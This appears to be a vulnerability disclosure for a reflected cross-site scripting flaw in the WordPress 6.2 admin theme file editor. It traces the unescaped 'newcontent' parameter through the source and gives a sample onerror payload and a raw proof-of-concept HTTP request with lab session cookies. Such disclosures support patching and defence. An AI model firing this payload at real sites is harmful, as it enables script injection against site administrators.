WordPress-V6.2 with Reflected-XSS in backend /wp-admin/theme-editor.php.
Description
Admin backend theme file editor component with reflected-XSS via POST parameter newcontent when the POST parameter theme does not exist.
Affected Version
WordPress <= 6.2
POC
Login to admin background management, editing a theme file in theme file editor component.
POST to /wp-admin/theme-editor.php with the right wordpress nonce, as well as the newcontent parameter which contains the XSS payload, e.g. </textarea><img src=x onerror=alert(1)><!--, remove the theme parameter at the same time.
In source code of /wp-admin/theme-editor.php, at line 125, the newcontent passes to $post_content, but wp_unslash does not filter any XSS payload.
At line 129, $post_content passes to $content, and at line 291, the $content is directly echoed to html.
Full POC request:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
POST/cms/wordpress/wp-admin/theme-editor.phpHTTP/1.1 Host: 192.168.0.10 Content-Length: 193 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.0.10 Referer: http://192.168.0.10/cms/wordpress/wp-admin/theme-editor.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: wordpress_a59a53e68d3cbba0d705bf0e4b02207b=admin%7C1678689608%7C1S0SKogKJyuDtqkpi3cDcwCyeAvKDNdQ6OW4BtMYgJQ%7Caf4d97cb01e4752e872af6fc5226c89263904830dda087656dbbd0fa79fcf29a; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_a59a53e68d3cbba0d705bf0e4b02207b=admin%7C1678689608%7C1S0SKogKJyuDtqkpi3cDcwCyeAvKDNdQ6OW4BtMYgJQ%7Ce2441da59527b55b9831572be4c5a5955c9acb44a4d72e2477feabfbb4efba21; wp-settings-time-1=1677480056; PHPSESSID=m7h7isuus6cugk6mb58vdah296 Connection: close
